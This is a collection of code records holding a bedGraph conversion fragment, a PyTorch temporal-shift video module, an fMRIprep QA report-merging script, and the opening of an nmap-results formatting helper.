self.blockEnd - self.blockStart + 1\n out.write(\"{}\\t{}\\t{}\\t{}\\n\".format(self.blockChrom, self.blockStart-1, self.blockEnd-1, self.total * self.scale / sz))\n\n def run_window(self, c, out):\n for line in c:\n if line[0] != self.blockChrom:\n self.writeWindow(out)\n self.initialize(line)\n elif int(line[1]) - self.blockStart < self.window:\n self.blockEnd = int(line[1])\n self.total += int(line[2])\n else:\n self.writeWindow(out)\n self.initialize(line)\n self.writeWindow(out)\n\n# Usage: depthToBedGraph in.bam -o out.bedGraph -c chrom -s scale\n\nif __name__ == \"__main__\":\n C = Converter(sys.argv[1:])\n C.run()\n","repo_name":"uf-icbr-bioinformatics/dasa","sub_path":"bin/depthToBedGraph.py","file_name":"depthToBedGraph.py","file_ext":"py","file_size_in_byte":3295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14719771943","text":"# Code for \"TSM: Temporal Shift Module for Efficient Video Understanding\"\n# arXiv:1811.08383\n# Ji Lin*, Chuang Gan, Song Han\n# {jilin, songhan}@mit.edu, ganchuang@csail.mit.edu\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision\nimport pdb\nimport numpy as np\n\nclass TemporalDiff(nn.Module):\n def __init__(self, in_channels, out_channels, n_segment, kernel_size, stride=1, padding=0, bias=True, n_div=8):\n super(TemporalDiff, self).__init__()\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.n_segment = n_segment\n self.kernel_size = kernel_size\n self.stride=stride\n self.padding=padding\n self.bias = bias\n self.n_div = n_div\n print('=> Using fold div: {}'.format(self.n_div))\n print('model equipped with temporal difference attention...')\n self.conv1_reduce = nn.Sequential(\n nn.Conv2d(in_channels, in_channels//n_div, kernel_size=1, stride=1, padding=padding, bias=bias),\n nn.BatchNorm2d(in_channels//n_div),\n nn.ReLU(inplace=True))\n self.conv2_reduce = nn.Sequential(\n nn.Conv2d(in_channels, in_channels//n_div, kernel_size=1, stride=1, padding=padding, bias=bias),\n nn.BatchNorm2d(in_channels//n_div),\n nn.ReLU(inplace=True))\n\n\n self.conv_inflate = nn.Sequential(\n nn.Conv2d(in_channels//n_div, in_channels, kernel_size=kernel_size, stride=1, padding=padding, bias=bias),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True))\n\n\n def forward(self, x):\n # out = F.conv2d(x, self.weight, None, self.stride, 0, 1, self.channels)\n # out = F.pad(out, pad= [0, 0, 0, 1])\n # x.size = N*C*T*(H*W)\n\n\n nt, c, h, w = x.size()\n n_batch = nt // self.n_segment\n\n\n out = F.adaptive_avg_pool2d(x, (1, 1))\n rc = self.in_channels // self.n_div\n # print(out.size())\n # exit()\n left = self.conv1_reduce(out).view(n_batch, self.n_segment, rc, 1, 1)\n right = self.conv2_reduce(out).view(n_batch, self.n_segment, rc, 1, 1)\n out = left[:, :-1] - right[:, 1:]\n out = out.view(n_batch*(self.n_segment-1), rc, 1, 1)\n out = self.conv_inflate(out)\n\n\n #out = torch.sqrt(out*out)\n out = torch.sigmoid(out)\n out = out.view(n_batch, self.n_segment-1, c)\n out = F.pad(out, pad=[0, 0, 0, 1], mode='constant', value=1)\n out = out.view(nt, c, 1, 1)\n\n return out*x\n\nclass ChannelGate(nn.Module):\n def __init__(self, channels):\n super(ChannelGate, self).__init__()\n self.linearProj = nn.Conv2d(channels, channels, kernel_size=1, stride=1, padding=0, bias=True)\n self.bn = nn.BatchNorm2d(channels)\n self.relu = nn.ReLU(inplace=True)\n # pdb.set_trace()\n self.channels = channels\n start_idx = int((channels-1)*0.9)\n self.t_linear = nn.Conv2d(channels, 1, kernel_size=1, stride=1, padding=0)\n self.sigmoid = nn.Sigmoid()\n # self.linearProj.weight.data.zero_()\n # self.linearProj.bias.data.zero_()\n # with torch.no_grad():\n # self.linearProj.weight[start_idx,:,:,:] += 1.0\n\n def forward(self, x):\n\n x = F.adaptive_avg_pool2d(x, (1, 1))\n x = self.linearProj(x)\n t = self.t_linear(x)\n x = self.bn(x)\n x_in = self.relu(x)\n x_out = F.softmax(x_in/(self.sigmoid(t)+0.0001), dim=1)\n # pdb.set_trace()\n out = torch.cumsum(x_out, dim=1)\n # pdb.set_trace()\n # pdb.set_trace()\n # out = torch.zeros(x.shape).cuda()\n # start_idx = int(self.channels*0.3)\n # out[:,start_idx:,:,:] = 1\n # pdb.set_trace()\n\n return out\n\nclass AccumAtt(nn.Module):\n def __init__(self, channels, n_segment):\n\n super(AccumAtt, self).__init__()\n\n self.channels = channels\n self.n_segment = n_segment\n\n self.conv1_reduce = nn.Sequential(\n nn.Conv2d(channels, channels//8, kernel_size=1, stride=1, padding=0, bias=False),\n nn.BatchNorm2d(channels//8),\n nn.ReLU(inplace=True))\n self.conv2_reduce = nn.Sequential(\n nn.Conv2d(channels, channels//8, kernel_size=1, stride=1, padding=0, bias=False),\n nn.BatchNorm2d(channels//8),\n nn.ReLU(inplace=True))\n\n self.Win = nn.Conv2d(channels//8, channels//8, kernel_size=(1,1), bias=True)\n self.Wg = nn.Conv2d(channels//8, channels//8, kernel_size=(1,1), bias=True)\n self.Wa = nn.Conv2d(channels//8, channels, kernel_size=(1,1), bias=True)\n self.gamma = nn.Conv2d(channels//4, 1, kernel_size=(1,1), bias=True)\n self.bn = nn.BatchNorm2d(channels//8)\n self.relu = nn.ReLU(inplace=True)\n\n self.sigmoid = nn.Sigmoid()\n self.relu = nn.ReLU()\n\n nn.init.xavier_uniform_(self.Win.weight)\n nn.init.xavier_uniform_(self.Wg.weight)\n nn.init.xavier_uniform_(self.Wa.weight)\n nn.init.xavier_uniform_(self.gamma.weight)\n self.Win.bias.data.zero_()\n self.Wg.bias.data.zero_()\n self.Wa.bias.data.zero_()\n self.gamma.bias.data.zero_()\n\n def forward(self, x):\n\n nt, c, w, h = x.size()\n n_batch = nt // self.n_segment\n\n x_vec = F.adaptive_avg_pool2d(x, (1,1))\n x = x.view(n_batch, self.n_segment, c, w, h)\n\n x_vec_left = self.conv1_reduce(x_vec).view(n_batch, self.n_segment, c//8, 1, 1)\n x_vec_right = self.conv2_reduce(x_vec).view(n_batch, self.n_segment, c//8, 1, 1)\n x_vec_diff = x_vec_left[:, :-1] - x_vec_right[:, 1:]\n x_vec_diff = F.pad(x_vec_diff, pad=[0, 0, 0, 0, 0, 0, 0, 1], mode='constant', value=1)\n\n x_global = x_vec_diff[:,-1] # torch.zeros((n_batch,c//8,1,1)).cuda()\n atts = []\n for t_idx in range(self.n_segment):\n # x_global = self.Win(x_vec_diff[:, t_idx, :, :, :].squeeze(1)) + self.Wg(x_global.clone())\n x_cat = torch.cat((x_vec_diff[:, t_idx, :, :, :].squeeze(1),x_global),dim=1)\n x_gamma = self.sigmoid(self.gamma(x_cat).repeat(1,c//8,1,1))\n x_global = x_vec_diff[:, t_idx, :, :, :].squeeze(1)*x_gamma + x_global.clone()*(1-x_gamma)\n x_att = self.sigmoid(self.Wa(x_global)).unsqueeze(1)\n atts.append(x_att)\n sigmas = torch.cat(atts, 1)\n out = x*sigmas\n\n # x_gather = []\n # x_accum = torch.zeros((n_batch,1,c,w,h)).cuda()\n\n # for t_idx in range(self.n_segment):\n # gamma = self.sigmoid(self.gamma(sigmas[:,t_idx,:,:,:]).unsqueeze(4).repeat(1,1,c,w,h))\n # x_accum = (1-gamma)*x_accum.clone() + gamma*x_atts[:, t_idx, :, :, :].unsqueeze(1)\n # x_gather.append(x_accum)\n # out = torch.cat(x_gather, 1).view(-1,c,w,h)\n\n return out.view(-1,c,w,h)\n\nclass TemporalDiffChannel(nn.Module):\n def __init__(self, in_channels, out_channels, n_segment, kernel_size, stride=1, padding=0, bias=True, n_div=8):\n super(TemporalDiffChannel, self).__init__()\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.n_segment = n_segment\n self.kernel_size = kernel_size\n self.stride=stride\n self.padding=padding\n self.bias = bias\n self.n_div = n_div\n\n\n self.diff_trans = nn.Sequential(\n nn.Conv2d(in_channels, in_channels, kernel_size=kernel_size, stride=1, padding=padding, bias=bias),\n nn.BatchNorm2d(in_channels),\n nn.ReLU(inplace=True))\n\n # identity_weight = torch.empty(self.diff_trans[0].weight.shape)\n # nn.init.dirac_(identity_weight)\n # self.diff_trans[0].weight.data.copy_(identity_weight)\n # self.diff_trans[0].weight.data.zero_()\n # self.diff_trans[0].bias.data.zero_()\n nn.init.xavier_uniform_(self.diff_trans[0].weight)\n self.diff_trans[1].weight.data.fill_(1)\n self.diff_trans[1].bias.data.zero_()\n\n self.ori_trans = nn.Sequential(\n nn.Conv2d(in_channels, in_channels, kernel_size=kernel_size, stride=1, padding=padding, bias=bias),\n nn.BatchNorm2d(in_channels),\n nn.ReLU(inplace=True))\n\n identity_weight = torch.empty(self.ori_trans[0].weight.shape)\n nn.init.dirac_(identity_weight)\n self.ori_trans[0].weight.data.copy_(identity_weight)\n # self.ori_trans[0].bias.data.zero_()\n self.ori_trans[1].weight.data.fill_(1)\n self.ori_trans[1].bias.data.zero_()\n\n self.channelGate = ChannelGate(in_channels)\n\n\n # self.shift_conv = TemporalShift(in_channels, (3,1), padding=(1,0), n_div=8, bias=False)\n\n # if 1 - 0.0 < 1e-5:\n # self.shift_conv.weight.requires_grad = False\n # else:\n # self.shift_conv.weight.requires_grad = True\n\n\n def forward(self, x):\n # out = F.conv2d(x, self.weight, None, self.stride, 0, 1, self.channels)\n # out = F.pad(out, pad= [0, 0, 0, 1])\n # x.size = N*C*T*(H*W)\n\n\n nt, c, h, w = x.size()\n n_batch = nt // self.n_segment\n\n x_ori = self.ori_trans(x)\n\n\n x = x.view(n_batch, self.n_segment, c, h, w)\n x_diff = x[:, :-1] - x[:, 1:]\n x_diff = F.pad(x_diff, pad=[0, 0, 0, 0, 0, 0, 0, 1], mode='constant', value=1).view(n_batch*self.n_segment, c, h, w)\n x_diff = self.diff_trans(x_diff)\n\n # reshape_x = x.view(n_batch, -1, c, h*w).permute(0, 2, 1, 3).contiguous()\n # shift_x = self.shift_conv(reshape_x)\n # shift_x = shift_x.permute(0,2,1,3).contiguous().view(nt, c, h, w)\n # x_shift = self.diff_trans(shift_x)\n\n channel_w = self.channelGate(x_diff)\n\n\n return channel_w * x_diff + (1-channel_w) * x_ori\n\n\nclass TemporalShift(nn.Module):\n def __init__(self, in_channels, kernel_size, stride=1, padding=0, bias=True, n_div=8, p_init_type='tsm'):\n super(TemporalShift, self).__init__()\n self.in_channels = in_channels\n self.kernel_size = kernel_size\n self.stride=stride\n self.padding=padding\n self.bias = bias\n self.fold_div = n_div\n print('=> Using fold div: {}'.format(self.fold_div))\n print('model equipped with shift conv...')\n # self.shift_conv = nn.Conv3d(in_channels, out_channels, kernel_size=kernel_size, stride=stride, groups=groups, padding=padding, bias=bias)\n if isinstance(kernel_size, int):\n kernel_size = (kernel_size, kernel_size)\n conv_params = torch.zeros((in_channels, 1)+kernel_size)\n # future_params = torch.zeros((in_channels, 1)+kernel_size)\n # print('params = ', data.size())\n fold = in_channels // n_div\n\n # TSM initialization\n if p_init_type == 'r_tsm':\n for i in range(in_channels):\n import random\n j = random.randint(0, kernel_size[0]-1)\n conv_params[i, :, j] = 1\n self.weight = nn.Parameter(conv_params)\n elif p_init_type == 'tsm':\n conv_params[:fold, :, kernel_size[0]//2+1] = 1\n conv_params[fold:2*fold, :, kernel_size[0]//2-1] = 1\n conv_params[2*fold: , :, kernel_size[0]//2] = 1\n self.weight = nn.Parameter(conv_params)\n elif p_init_type == 'TSN':\n conv_params[:, :, kernel_size[0]//2] = 1\n self.weight = nn.Parameter(conv_params)\n else:\n init.kaiming_uniform_(self.weight, a=math.sqrt(4))\n\n\n\n\n def forward(self, x):\n return F.conv2d(x, self.weight, None, self.stride, self.padding, 1, self.in_channels)\n\nclass TemporalShiftBilinearLocal(nn.Module):\n def __init__(self, in_channels, kernel_size, stride=1, padding=0, bias=True, n_div=8, p_init_type='tsm'):\n super(TemporalShiftBilinearLocal, self).__init__()\n self.in_channels = in_channels\n self.kernel_size = kernel_size\n self.stride=stride\n self.padding=padding\n self.bias = bias\n self.fold_div = n_div\n print('=> Using fold div: {}'.format(self.fold_div))\n print('model equipped with shift conv...')\n # self.shift_conv = nn.Conv3d(in_channels, out_channels, kernel_size=kernel_size, stride=stride, groups=groups, padding=padding, bias=bias)\n if isinstance(kernel_size, int):\n kernel_size = (kernel_size, kernel_size)\n conv_params1 = torch.zeros((in_channels, 1)+kernel_size)\n conv_params2 = torch.zeros((in_channels, 1)+kernel_size)\n\n # future_params = torch.zeros((in_channels, 1)+kernel_size)\n # print('params = ', data.size())\n fold = in_channels // n_div\n\n # TSM initialization\n if p_init_type == 'r_tsm':\n for i in range(in_channels):\n import random\n j = random.randint(0, kernel_size[0]-1)\n conv_params1[i, :, j] = 1\n self.weight1 = nn.Parameter(conv_params1)\n elif p_init_type == 'tsm':\n conv_params1[:fold, :, kernel_size[0]//2+1] = 1\n conv_params1[fold:2*fold, :, kernel_size[0]//2-1] = 1\n conv_params1[2*fold: , :, kernel_size[0]//2] = 1\n self.weight1 = nn.Parameter(conv_params1)\n elif p_init_type == 'TSN':\n conv_params1[:, :, kernel_size[0]//2] = 1\n self.weight1 = nn.Parameter(conv_params1)\n else:\n init.kaiming_uniform_(self.weight1, a=math.sqrt(4))\n\n\n # TSM initialization\n if p_init_type == 'r_tsm':\n for i in range(in_channels):\n import random\n j = random.randint(0, kernel_size[0]-1)\n conv_params2[i, :, j] = 1\n self.weight2 = nn.Parameter(conv_params2)\n elif p_init_type == 'tsm':\n conv_params2[:fold, :, kernel_size[0]//2+1] = 1\n conv_params2[fold:2*fold, :, kernel_size[0]//2-1] = 1\n conv_params2[2*fold: , :, kernel_size[0]//2] = 1\n self.weight2 = nn.Parameter(conv_params2)\n elif p_init_type == 'TSN':\n conv_params2[:, :, kernel_size[0]//2] = 1\n self.weight2 = nn.Parameter(conv_params2)\n else:\n init.kaiming_uniform_(self.weight2, a=math.sqrt(4))\n\n self.bn = nn.BatchNorm2d(in_channels)\n self.relu = nn.ReLU()\n\n def forward(self, x):\n # pdb.set_trace()\n # first-order bilinear\n # n, c, t, s = x.size()\n # x_div1 = x[:,:c//4,:,:]\n # x_div2 = x[:,c//4:,:,:]\n # identity = x_div1\n # # pdb.set_trace()\n # shift = F.conv2d(x_div1, self.weight, None, self.stride, self.padding, 1, 2*self.in_channels//self.fold_div)\n # x_div1 = torch.tanh(identity*shift)\n #\n # out = torch.cat((x_div1, x_div2), 1)\n #\n # return out\n\n # second-order bilinear\n n, c, t, s = x.size()\n x_div1 = x\n # x_div1 = x[:,:c//4,:,:]\n # x_div2 = x[:,c//4:,:,:]\n # identity = x_div1\n # pdb.set_trace()\n x_div1 = torch.mul(torch.sign(x_div1),torch.sqrt(torch.abs(x_div1)+1e-12))\n shift1 = F.conv2d(x_div1, self.weight1, None, self.stride, self.padding, 1, self.in_channels)\n shift2 = F.conv2d(x_div1, self.weight2, None, self.stride, self.padding, 1, self.in_channels)\n\n x_div1 = self.bn(shift1*shift2)\n x_div1 = self.relu(x_div1)\n\n # out = torch.cat((x_div1, x_div2), 1)\n out = x_div1\n return out\n\nclass TemporalGlobal(nn.Module):\n def __init__(self, net, n_segment=3, has_att=False, include_loss=False, n_div=8, shift_kernel=3, shift_grad=0.0):\n super(TemporalGlobal, self).__init__()\n self.net = net\n assert isinstance(net, torchvision.models.resnet.Bottleneck)\n self.n_segment = n_segment\n self.has_att = has_att\n self.fold_div = n_div\n self.include_loss = include_loss\n if has_att:\n # self.diff_conv = TemporalDiffChannel(net.conv1.in_channels, net.conv1.in_channels, n_segment, (1,1), padding=(0, 0), n_div=n_div, bias=False)\n self.accum_att = AccumAtt(net.conv1.in_channels, n_segment)\n self.shift_conv = TemporalShift(net.conv1.in_channels, (shift_kernel,1), padding=(shift_kernel//2,0), n_div=n_div, bias=False)\n # self.shift_conv_bilinear = TemporalShiftBilinearLocal(net.conv1.in_channels, (shift_kernel,1), padding=(shift_kernel//2,0), n_div=n_div, bias=False)\n if shift_grad - 0.0 < 1e-5:\n self.shift_conv.weight.requires_grad = False\n else:\n self.shift_conv.weight.requires_grad = True\n\n # Index for Temporal Pairwise Consine Similarity\n n_repeat = np.linspace(n_segment-1, 1, n_segment-1).astype(int)\n self.ind1 = np.linspace(0, n_segment-2, n_segment-1).astype(int).repeat(n_repeat, axis=0)\n self.ind1 = torch.tensor(self.ind1).long()\n\n self.ind2 = np.empty(0)\n for i in range(n_segment-1):\n ind_new = np.linspace(i+1, n_segment-1, n_segment-i-1).astype(int)\n self.ind2 = np.concatenate((self.ind2, ind_new), axis=0)\n self.ind2 = torch.tensor(self.ind2).long()\n\n # Index for neighbor frames\n self.ind3 = np.linspace(0, n_segment-2, n_segment-1).astype(int)\n self.ind3 = torch.tensor(self.ind3).long()\n self.ind4 = self.ind3 + 1\n\n # Index for frames far away\n n_repeat = np.linspace(n_segment-2, 1, n_segment-2).astype(int)\n self.ind5 = np.linspace(0, n_segment-3, n_segment-2).astype(int).repeat(n_repeat, axis=0)\n self.ind6 = np.empty(0)\n for i in range(n_segment-2):\n ind_new = np.linspace(i+2, n_segment-1, n_segment-i-2).astype(int)\n self.ind6 = np.concatenate((self.ind6, ind_new), axis=0)\n self.ind6 = torch.tensor(self.ind6).long()\n\n # pdb.set_trace()\n\n\n def forward(self, in_vec):\n\n x = in_vec[0]\n td_loss = in_vec[1]\n\n nt, c, h, w = x.size()\n n_batch = nt // self.n_segment\n\n identity = x\n if self.has_att:\n out = self.accum_att(x)\n else:\n out = x\n reshape_x = out.view(n_batch, -1, c, h*w).permute(0, 2, 1, 3).contiguous()\n shift_x = self.shift_conv(reshape_x)\n shift_x = shift_x.permute(0,2,1,3).contiguous().view(nt, c, h, w)\n\n\n if self.include_loss:\n out_td = shift_x\n nt, nc, w, h = out_td.size()\n n_batch = nt // self.n_segment\n\n nc_split = nc//2\n\n out_t = out_td.view(n_batch, self.n_segment, nc, w, h).permute(0,2,1,3,4).view(n_batch, nc, self.n_segment, -1)\n out_t1 = out_t.index_select(2, self.ind1.cuda())\n out_t2 = out_t.index_select(2, self.ind2.cuda())\n td_loss += torch.cosine_similarity(out_t1, out_t2, dim=3).mean(2).sum(1)\n td_simi = torch.cosine_similarity(out_t1[:,:nc_split], out_t2[:,:nc_split],dim=3).mean(2).sum(1)\n td_diff = torch.cosine_similarity(out_t1[:,nc_split:], out_t2[:,nc_split:],dim=3).mean(2).sum(1)\n td_loss += td_diff - td_simi\n\n # out_t = out.view(n_batch, self.n_segment, nc, w, h).permute(0,2,1,3,4).view(n_batch, nc, self.n_segment, -1)\n # out_t1 = out_t.index_select(2, self.ind3.cuda())\n # out_t2 = out_t.index_select(2, self.ind4.cuda())\n # td_simi = ((1-torch.cosine_similarity(out_t1, out_t2, dim=3))/2).mean(2).sum(1)\n #\n # out_t3 = out_t.index_select(2, self.ind5.cuda())\n # out_t4 = out_t.index_select(2, self.ind6.cuda())\n # pdb.set_trace()\n # td_diff = torch.cosine_similarity(out_t3, out_t4, dim=3).mean(2).sum(1)\n\n\n else:\n\n td_loss += 0\n\n# identity = x\n# if self.has_att:\n# out = self.accum_att(x)\n# else:\n# out = x\n# reshape_x = out.view(n_batch, -1, c, h*w).permute(0, 2, 1, 3).contiguous()\n# shift_x = self.shift_conv(reshape_x)\n# shift_x = shift_x.permute(0,2,1,3).contiguous().view(nt, c, h, w)\n\n out = self.net.conv1(shift_x)\n out = self.net.bn1(out)\n out = self.net.relu(out)\n\n out = self.net.conv2(out)\n out = self.net.bn2(out)\n out = self.net.relu(out)\n\n out = self.net.conv3(out)\n out = self.net.bn3(out)\n\n if self.net.downsample is not None:\n identity = self.net.downsample(x)\n\n out += identity\n out = self.net.relu(out)\n\n return out, td_loss\n\n\nclass TemporalPool(nn.Module):\n def __init__(self, net, n_segment):\n super(TemporalPool, self).__init__()\n self.net = net\n self.n_segment = n_segment\n\n def forward(self, x):\n x = self.temporal_pool(x, n_segment=self.n_segment)\n return self.net(x)\n\n @staticmethod\n def temporal_pool(x, n_segment):\n nt, c, h, w = x.size()\n n_batch = nt // n_segment\n x = x.view(n_batch, n_segment, c, h, w).transpose(1, 2) # n, c, t, h, w\n x = F.max_pool3d(x, kernel_size=(3, 1, 1), stride=(2, 1, 1), padding=(1, 0, 0))\n x = x.transpose(1, 2).contiguous().view(nt // 2, c, h, w)\n return x\n\n\ndef make_temporal_shift(net, n_segment, has_att=False, n_div=8, place='blockres', shift_type='iCover', shift_kernel=3, shift_grad=0.0, temporal_pool=False):\n if temporal_pool:\n n_segment_list = [n_segment, n_segment // 2, n_segment // 2, n_segment // 2]\n else:\n n_segment_list = [n_segment] * 4\n assert n_segment_list[-1] > 0\n print('=> n_segment per stage: {}'.format(n_segment_list))\n\n import torchvision\n if isinstance(net, torchvision.models.ResNet):\n if place == 'block':\n def make_block_temporal(stage, this_segment):\n blocks = list(stage.children())\n # print(blocks)\n # exit()\n print('=> Processing stage with {} blocks'.format(len(blocks)))\n for i, b in enumerate(blocks):\n blocks[i] = TemporalShift(b, n_segment=this_segment, n_div=n_div, shift_type=shift_type)\n return nn.Sequential(*(blocks))\n\n net.layer1 = make_block_temporal(net.layer1, n_segment_list[0])\n net.layer2 = make_block_temporal(net.layer2, n_segment_list[1])\n net.layer3 = make_block_temporal(net.layer3, n_segment_list[2])\n net.layer4 = make_block_temporal(net.layer4, n_segment_list[3])\n\n elif 'blockres' in place:\n n_round = 1\n if len(list(net.layer3.children())) >= 23:\n print('=> Using n_round {} to insert temporal shift'.format(n_round))\n\n def make_block_temporal(stage, this_segment, has_att, stg):\n blocks = list(stage.children())\n print('=> Processing stage with {} blocks residual'.format(len(blocks)))\n for i, b in enumerate(blocks):\n # if i == len(blocks)-1:\n # blocks[i].conv1 = TemporalShift(b.conv1, n_segment=this_segment, n_div=n_div, shift_type=shift_type)\n blocks[i] = TemporalGlobal(b, n_segment=this_segment, has_att=has_att, n_div=n_div, include_loss=True if (i == len(blocks)-1 and stg != 1) else False)\n return nn.Sequential(*blocks)\n\n net.layer1 = make_block_temporal(net.layer1, n_segment_list[0], has_att, 1)\n net.layer2 = make_block_temporal(net.layer2, n_segment_list[1], has_att, 2)\n net.layer3 = make_block_temporal(net.layer3, n_segment_list[2], has_att, 3)\n net.layer4 = make_block_temporal(net.layer4, n_segment_list[3], has_att, 4)\n else:\n raise NotImplementedError(place)\n\n\ndef make_temporal_pool(net, n_segment):\n import torchvision\n if isinstance(net, torchvision.models.ResNet):\n print('=> Injecting nonlocal pooling')\n net.layer2 = TemporalPool(net.layer2, n_segment)\n else:\n raise NotImplementedError\n\n\nif __name__ == '__main__':\n # test inplace shift v.s. vanilla shift\n tsm1 = TemporalShift(nn.Sequential(), n_segment=8, n_div=8, inplace=False)\n tsm2 = TemporalShift(nn.Sequential(), n_segment=8, n_div=8, inplace=True)\n\n print('=> Testing CPU...')\n # test forward\n with torch.no_grad():\n for i in range(10):\n x = torch.rand(2 * 8, 3, 224, 224)\n y1 = tsm1(x)\n y2 = tsm2(x)\n assert torch.norm(y1 - y2).item() < 1e-5\n\n # test backward\n with torch.enable_grad():\n for i in range(10):\n x1 = torch.rand(2 * 8, 3, 224, 224)\n x1.requires_grad_()\n x2 = x1.clone()\n y1 = tsm1(x1)\n y2 = tsm2(x2)\n grad1 = torch.autograd.grad((y1 ** 2).mean(), [x1])[0]\n grad2 = torch.autograd.grad((y2 ** 2).mean(), [x2])[0]\n assert torch.norm(grad1 - grad2).item() < 1e-5\n\n print('=> Testing GPU...')\n tsm1.cuda()\n tsm2.cuda()\n # test forward\n with torch.no_grad():\n for i in range(10):\n x = torch.rand(2 * 8, 3, 224, 224).cuda()\n y1 = tsm1(x)\n y2 = tsm2(x)\n assert torch.norm(y1 - y2).item() < 1e-5\n\n # test backward\n with torch.enable_grad():\n for i in range(10):\n x1 = torch.rand(2 * 8, 3, 224, 224).cuda()\n x1.requires_grad_()\n x2 = x1.clone()\n y1 = tsm1(x1)\n y2 = tsm2(x2)\n grad1 = torch.autograd.grad((y1 ** 2).mean(), [x1])[0]\n grad2 = torch.autograd.grad((y2 ** 2).mean(), [x2])[0]\n assert torch.norm(grad1 - grad2).item() < 1e-5\n print('Test passed.')\n","repo_name":"ShiningSord/Truncate-Split-Contrast-A-Framework-for-Learning-from-Mislabeled-Videos","sub_path":"ops/temporal_shift_td.py","file_name":"temporal_shift_td.py","file_ext":"py","file_size_in_byte":25662,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"32830452408","text":"#!/usr/bin/python\n\n## *** I am not using this code as it seems to be ineffective ***\n## The combined html file works very slow...\n\n# Create a a combined html file for the output of the fMRIprep\n\nimport os\nimport glob\n\n# Parameters:\n# -------------------\n# files and directories:\ndatadir = '/export2/DATA/HIS/HIS_server/BIDS/derivatives/fmriprep/'\noutdir = \"/export2/DATA/HIS/HIS_server/analysis/QA/fMRIprep/\"\noutfile = outdir + \"fMRIprep_QA.html\"\n\n# run the procedure\n# --------------------\n# delete older files\nprint('\\n** QA fMRIprep (combining report htmls to fMRIprep_QA.html)')\nos.system(\"rm %s\"%(outfile))\nos.system(\"rm -rf \" + outdir + ' sub-*/')\nos.system(\"mkdir \" + outdir)\n\nall_subjects = sorted(glob.glob(datadir + 'sub-*/'))\n\nisErrorLogs = False\nisWarningLogs = False\nf = open(outfile, \"w\")\nfor file in list(all_subjects):\n subject = file.split('/')[-2]\n main_html = datadir + subject + \".html\"\n figures_source_dir = datadir + subject + '/figures'\n figures_out_dir = outdir + subject + '/figures'\n # write the combined html\n f.write(\"

=================\" + subject + \"===========================\\n\")\n with open(main_html, 'r') as content_file:\n content = content_file.read()\n f.write(content)\n # copy the relevant figures\n os.system(\"mkdir -p \" + figures_out_dir)\n os.system(\"cp -r \" + figures_source_dir + \"/* \" + figures_out_dir)\n\n # check the log file for errors:\n\n if os.popen(\"grep -i 'No errors to report' \" + main_html).read():\n pass\n elif os.popen(\"grep -i 'error' \" + main_html).read():\n print('-- ERROR in the log of the fmriprep: ' + file)\n print(os.popen(\"grep -i 'error' \" + main_html).read())\n isErrorLogs = True\n if os.popen(\"grep -i 'warning' \" + main_html).read():\n print('-- WARNING in the log of the fmriprep: ' + file)\n print(os.popen(\"grep -i 'warning' \" + main_html).read())\n isWarningLogs = True\nf.close()\n\nprint('** QA fMRIprep (creating fMRIprep_QA.html) COMPLETED.')\nif isErrorLogs:\n print('\\n *** THERE ARE LOG FILES WITH ERRORS TO EXAMINE *** ')\nif isWarningLogs:\n print('\\n *** THERE ARE LOG FILES WITH WARNINGS TO EXAMINE *** ')\n","repo_name":"ranigera/MultiModalMRI_Habits","sub_path":"3_task_fMRI_analysis_codes/QA_fMRIprep.py","file_name":"QA_fMRIprep.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"32456079638","text":"import os, re, sys, subprocess, ipaddress, time\nfrom subprocess import Popen,PIPE\nimport xml.etree.ElementTree as ET\nimport tabulate\n\nfrom IPy import IP\n\nfrom modules import constants\nfrom modules import settings\nfrom modules import common\nfrom modules import nmap\n\n# Source: https://github.com/django/django/blob/master/django/core/management/color.py\ndef supportsColour():\n \"\"\"\n Return True if the running system's terminal supports color,\n and False otherwise.\n \"\"\"\n plat = sys.platform\n supported_platform = plat != 'Pocket PC' and (plat != 'win32' or 'ANSICON' in os.environ)\n\n # isatty is not always implemented, #6223.\n is_a_tty = hasattr(sys.stdout, 'isatty') and sys.stdout.isatty()\n return supported_platform and is_a_tty\n \n\n# Colour output green (successprint)\ndef sprint(*args, **kwargs):\n colouredPrint(\"\\033[1;32m\", args, kwargs)\n\n# Print to stderr\ndef eprint(*args, **kwargs):\n colouredPrint(\"\\033[1;31m\", args, kwargs)\n\n# Print text with specified colour code\ndef colouredPrint(colour, args, kwargs):\n if(not settings.colourSupported):\n print(args, kwargs)\n return\n\n colouredArgs = []\n for arg in args:\n if arg == None or not isinstance(arg, str):\n colouredArgs.append('')\n continue\n colouredArgs.append(colour + arg + \"\\033[1;m\")\n print(*colouredArgs, file=sys.stderr, **kwargs)\n\n# Print only if raw option hasnt been set\ndef hprint(*args, **kwargs):\n settings.printHumanFriendlyText\n if(settings.printHumanFriendlyText):\n print(*args, **kwargs)\n\ndef getHeader(text):\n header = os.linesep + text + os.linesep\n header += '-' * len(text) + os.linesep\n return header\n\ndef header(text):\n hprint(getHeader(text))\n\ndef printUniquePorts(hosts, option=constants.PORT_OPT_DEFAULT, filters=None):\n textOutput = getUniquePortsOutput(hosts, option, filters=filters)\n textOutput.printToConsole()\n\ndef getUniquePortsOutput(hosts, option=constants.PORT_OPT_DEFAULT, filters=None):\n if filters == None:\n filters = nmap.NmapFilters()\n tcpPorts = set()\n udpPorts = set()\n allPorts = set()\n for ip in hosts:\n host = hosts[ip]\n tcpPorts = tcpPorts.union(host.getUniquePortIds('tcp', port_filter=filters.ports, service_filter=filters.services))\n udpPorts = udpPorts.union(host.getUniquePortIds('udp', port_filter=filters.ports, service_filter=filters.services))\n allPorts = tcpPorts.union(udpPorts)\n\n output = common.TextOutput()\n output.addHumn(getNmapFiltersString(filters))\n output.addHumn(getHeader('Unique open port list (%s)' % (option)))\n if option == constants.PORT_OPT_DEFAULT:\n output.addHumn(getHeader(\"TCP:\"))\n output.addMain(re.sub(r'[\\[\\] ]','',str(sorted(tcpPorts))))\n output.addHumn(getHeader(\"UDP:\"))\n output.addMain(re.sub(r'[\\[\\] ]','',str(sorted(udpPorts))))\n output.addHumn(getHeader(\"Combined:\"))\n output.addMain(re.sub(r'[\\[\\] ]','',str(sorted(allPorts))))\n elif option == 